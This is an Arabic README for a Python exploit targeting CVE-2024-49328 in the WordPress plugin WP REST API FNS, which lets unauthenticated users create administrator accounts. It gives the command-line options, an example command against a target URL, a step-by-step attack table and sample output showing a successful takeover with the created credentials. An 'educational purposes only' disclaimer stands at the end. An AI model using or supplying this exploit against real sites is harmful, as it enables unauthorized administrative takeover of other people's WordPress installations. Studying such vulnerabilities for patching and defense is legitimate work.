
سكربت بايثون لاستغلال ثغرة تصعيد الامتيازات في إضافة WP REST API FNS الخاصة بـ WordPress، مما يتيح إنشاء حسابات مسؤول دون مصادقة.
يستغل هذا البرنامج النصي ثغرة تصعيد الامتيازات في إضافة WP REST API FNS الخاصة بووردبريس. تؤثر الثغرة على جميع الإصدارات حتى 1.0.0 وما يتضمنه، مما يسمح للمهاجمين غير المصادق عليهم بالحصول على صلاحيات المسؤول.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-e NEWEMAIL, --Newemail NEWEMAIL New email to register
-p PASSWORD, --password PASSWORD Password for the new user
مثال على الأمر:
python CVE-2024-49328.py -u http://targetsite.com -e [email protected] -p password123
| الخطوة | الوصف | الأيقونة |
|---|---|---|
| الخطوة 1 | تحقق من إصدار الإضافة. | 📝 |
| الخطوة 2 | تحقق مما إذا كان الإصدار قابلًا للاستغلال (1.0.0، أو أقل). | ✅ |
| الخطوة 3 | استغل الثغرة وسجّل مستخدمًا إداريًا جديدًا. | 🔒 |
| الخطوة 4 | اطبع النتيجة مع بيانات اعتماد المستخدم للتحقق. | 🎉 |
Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: [email protected]
Password: nxploit
pip install requests
🚨 تحذير:
هذا البرنامج النصي لأغراض تعليمية فقط. الاستخدام غير المصرح به لهذا البرنامج النصي ضد الأنظمة دون إذن صريح غير قانوني وغير أخلاقي.